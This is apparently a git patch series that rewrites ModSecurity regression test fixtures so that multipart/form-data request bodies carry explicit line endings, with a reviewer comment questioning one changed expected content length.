@@ -82,21 +82,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "This is another very small test file..\r", - "----------------------------756b6d74fa1a8ee2--\r" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "This is another very small test file..\r\n", + "----------------------------756b6d74fa1a8ee2--\r\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-MULTIPART_FILENAME.json b/test/test-cases/regression/variable-MULTIPART_FILENAME.json index 1c54736ac2..1e83a7d849 100644 --- a/test/test-cases/regression/variable-MULTIPART_FILENAME.json +++ b/test/test-cases/regression/variable-MULTIPART_FILENAME.json 
@@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -51,7 +51,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"small_text_file.txt\" \\(Variable: MULTIPART_FILENAME" + "debug_log":"Target value: \"small_text_file.txt\" \\(Variable: MULTIPART_FILENAME" }, "rules":[ "SecRuleEngine On", 
@@ -82,21 +82,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "This is another very small test file..\r", - "----------------------------756b6d74fa1a8ee2--\r" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "This is another very small test file..\r\n", + "----------------------------756b6d74fa1a8ee2--\r\n" ] }, "response":{ @@ -110,7 +110,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"small_text_file2.txt\" \\(Variable: MULTIPART_FILENAME" + "debug_log":"Target value: \"small_text_file2.txt\" \\(Variable: MULTIPART_FILENAME" }, "rules":[ "SecRuleEngine On", diff --git a/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json b/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json index b9e14f98b3..dd196a41cb 100644 --- a/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json +++ b/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json 
@@ -23,17 +23,17 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data;", - " name=\"a\"", - "", - "1", - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data;", - " name=\"b\"", - "", - "2", - "-------------------------------69343412719991675451336310646--" + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data;\n", + " name=\"a\"\n", + "\n", + "1\n", + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data;\n", + " name=\"b\"\n", + "\n", + "2\n", + "-------------------------------69343412719991675451336310646--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-MULTIPART_NAME.json b/test/test-cases/regression/variable-MULTIPART_NAME.json index c4ee2b0c57..63e5f629e1 100644 --- a/test/test-cases/regression/variable-MULTIPART_NAME.json +++ b/test/test-cases/regression/variable-MULTIPART_NAME.json 
@@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -51,7 +51,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"filedata\" \\(Variable: MULTIPART_NAME" + "debug_log":"Target value: \"filedata\" \\(Variable: MULTIPART_NAME" }, "rules":[ "SecRuleEngine On", 
@@ -82,21 +82,21 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata2\"; filename=\"small_text_file2.txt\"\r",
- "Content-Type: text/plain\r",
- "\r",
- "This is another very small test file..\r",
- "----------------------------756b6d74fa1a8ee2--\r"
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata2\"; filename=\"small_text_file2.txt\"\r\n",
+ "Content-Type: text/plain\r\n",
+ "\r\n",
+ "This is another very small test file..\r\n",
+ "----------------------------756b6d74fa1a8ee2--\r\n"
 ]
 },
 "response":{
@@ -110,7 +110,7 @@
 ]
 },
 "expected":{
- "debug_log":"Target value: \"filedata2\" \\(Variable: MULTIPART_NAME"
+ "debug_log":"Target value: \"filedata2\" \\(Variable: MULTIPART_NAME"
 },
 "rules":[
 "SecRuleEngine On",
diff --git a/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json b/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json
index 1669589e9d..12700963db 100644
--- a/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json
+++ b/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json
@@ -23,16 +23,16 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-------------------------------69343412719991675451336310646",
- "Content-Disposition: form-data; name=parm1",
- "Content-Type: image/jpeg",
- "",
- "1",
- "-------------------------------69343412719991675451336310646",
- "Content-Disposition: form-data; name=parm2",
- "",
- "2",
- "-------------------------------69343412719991675451336310646--"
+ "-------------------------------69343412719991675451336310646\n",
+ "Content-Disposition: form-data; name=parm1\n",
+ "Content-Type: image/jpeg\n",
+ "\n",
+ "1\n",
+ "-------------------------------69343412719991675451336310646\n",
+ "Content-Disposition: form-data; name=parm2\n",
+ "\n",
+ "2\n",
+ "-------------------------------69343412719991675451336310646--\n"
 ]
 },
 "response":{
@@ -78,16 +78,16 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-------------------------------69343412719991675451336310646",
- "Content-Disposition: form-data; name=parm1",
- "Content-Type: image/jpeg",
- "",
- "1",
- "-------------------------------69343412719991675451336310646",
- "Content-Disposition: form-data; name=parm2",
- "",
- "2",
- "-------------------------------69343412719991675451336310646--"
+ "-------------------------------69343412719991675451336310646\n",
+ "Content-Disposition: form-data; name=parm1\n",
+ "Content-Type: image/jpeg\n",
+ "\n",
+ "1\n",
+ "-------------------------------69343412719991675451336310646\n",
+ "Content-Disposition: form-data; name=parm2\n",
+ "\n",
+ "2\n",
+ "-------------------------------69343412719991675451336310646--\n"
 ]
 },
 "response":{
diff --git a/test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json b/test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json
index 3967f78744..6270c383e3 100644
--- a/test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json
+++ b/test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json
@@ -23,21 +23,21 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is another very small test file..",
- "--------------------------756b6d74fa1a8ee2--"
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2--\n"
 ]
 },
 "response":{
@@ -82,21 +82,21 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is another very small test file..",
- "--------------------------756b6d74fa1a8ee2--"
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2--\n"
 ]
 },
 "response":{
@@ -141,21 +141,21 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is another very small test file..",
- "--------------------------756b6d74fa1a8ee2--whee."
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2--whee.\n"
 ]
 },
 "response":{
@@ -200,21 +200,21 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is another very small test file..",
- "----------------------------756b6d74fa1a8ee2--"
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2--\n"
 ]
 },
 "response":{
@@ -259,21 +259,21 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name='filedata'; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is another very small test file..",
- "--------------------------756b6d74fa1a8ee2--"
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name='filedata'; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2--\n"
 ]
 },
 "response":{
@@ -318,11 +318,11 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz '()+_,-./:=?",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "1",
- "--0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz '()+_,-./:=?--"
+ "--0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz '()+_,-./:=?\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "1\n",
+ "--0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz '()+_,-./:=?--\n"
 ]
 },
 "response":{
@@ -367,21 +367,21 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=file'data; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is another very small test file..",
- "----------------------------756b6d74fa1a8ee2--"
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=file'data; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2--\n"
 ]
 },
 "response":{
diff --git a/test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json b/test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json
index 97b34d5552..e1c5dde4ce 100644
--- a/test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json
+++ b/test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json
@@ -23,21 +23,21 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is another very small test file..",
- ""
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "\n"
 ]
 },
 "response":{
diff --git a/test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json b/test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json
index 029a65bd08..4761580620 100644
--- a/test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json
+++ b/test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json
@@ -102,20 +102,20 @@
 "http_version":1.1,
 "method":"POST",
 "body": [
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is another very small test file.."
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n"
 ]
 },
 "response":{
diff --git a/test/test-cases/regression/variable-REQUEST_BODY.json b/test/test-cases/regression/variable-REQUEST_BODY.json
index 9a1dacba8b..93e0f5e6d6 100644
--- a/test/test-cases/regression/variable-REQUEST_BODY.json
+++ b/test/test-cases/regression/variable-REQUEST_BODY.json
@@ -23,21 +23,21 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is another very small test file..",
- "--------------------------756b6d74fa1a8ee2--"
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2--\n"
 ]
 },
 "response":{
diff --git a/test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json b/test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json
index 584b9e9ce6..8ce7834c08 100644
--- a/test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json
+++ b/test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json
@@ -23,21 +23,21 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "--------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"",
- "Content-Type: text/plain",
- "",
- "This is another very small test file..",
- "--------------------------756b6d74fa1a8ee2--"
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "--------------------------756b6d74fa1a8ee2--\n"
 ]
 },
 "response":{
diff --git a/test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json b/test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json
index f71bc707c7..e8c5334839 100644
--- a/test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json
+++ b/test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json
@@ -32,7 +32,7 @@
 ]
 },
 "expected":{
- "debug_log":"Target value: \"9\" \\(Variable: RESPONSE_CONTENT_LENGTH\\)"
+ "debug_log":"Target value: \"8\" \\(Variable: RESPONSE_CONTENT_LENGTH\\)"
 },
 "rules":[
 "SecRuleEngine On",
From e03f8a18d5f63398ec185c7b11a458f6365db0b3 Mon Sep 17 00:00:00 2001
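Review bot: The `@@ -32,7 +32,7 @@` hunk in variable-RESPONSE_CONTENT_LENGTH.json lowers the expected value from 9 to 8 instead of keeping the fixture's bytes unchanged, which is the opposite of what the request-body hunks in this patch do by appending `\n` to every line. Presumably the response body (outside the hunk) lost the trailing newline the harness used to add. Appending `\n` to its last element would leave `"debug_log":"Target value: \"9\" \\(Variable: RESPONSE_CONTENT_LENGTH\\)"` valid and keep the newline-terminated case covered. If the shorter body is intended, a second case with the terminated body would pin both lengths.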
From: Hiroaki Nakamura Date: Sun, 25 Jan 2026 21:04:37 +0900 Subject: [PATCH 03/29] Replace CRLF to LF in test case JSON files
---
 .../request-body-parser-multipart.json | 4896 ++++++++--------- .../variable-MULTIPART_CRLF_LF_LINES.json | 242 +- .../variable-MULTIPART_FILENAME.json | 242 +- ...able-MULTIPART_INVALID_HEADER_FOLDING.json | 122 +- .../regression/variable-MULTIPART_NAME.json | 242 +- .../variable-MULTIPART_PART_HEADERS.json | 436 +- 6 files changed, 3090 insertions(+), 3090 deletions(-)
diff --git a/test/test-cases/regression/request-body-parser-multipart.json b/test/test-cases/regression/request-body-parser-multipart.json
index 1c5586fcf7..9b23f78913 100644
--- a/test/test-cases/regression/request-body-parser-multipart.json
+++ b/test/test-cases/regression/request-body-parser-multipart.json
@@ -1,2451 +1,2451 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (normal)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=0000", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "--0000\r\n", - "Content-Disposition: form-data; name=\"name\"\r\n", - "\r\n", - "Brian Rectanus\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"email\"\r\n", - "\r\n", - "brian.rectanus@breach.com\r\n", - "--0000\r\n", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r\n", - "Content-Type: image/jpeg\r\n", - "\r\n", - "BINARYDATA\r\n", - "--0000--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ] - }, - "expected":{ - "debug_log":"Added file part to the list: name \"image\" file name \"image.jpg\" \\(offset 258, length 10\\)" - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", - "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"multipart parser (final CRLF)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"a\"\r\n", - "\r\n", - "1\r\n", - "-----------------------------69343412719991675451336310646\r\n", - "Content-Disposition: form-data; name=\"b\"\r\n", - "\r\n", - "2\r\n", - "-----------------------------69343412719991675451336310646--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
